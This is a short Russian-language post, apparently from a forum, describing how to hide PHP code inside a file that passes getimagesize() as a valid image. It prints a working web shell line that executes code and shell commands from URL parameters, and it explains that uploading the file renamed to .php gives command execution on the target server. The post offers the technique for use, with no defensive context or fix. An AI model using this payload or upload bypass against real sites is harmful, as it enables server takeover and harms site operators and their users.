Сделал интересную "картинку", обходящую функцию getimagesize(). В чём идея? В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать PHP: <? eval(stripslashes($_GET['c'])); system($_GET['s']); ?> Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно. Баг найден Eugen'ом с tem.dp.ua
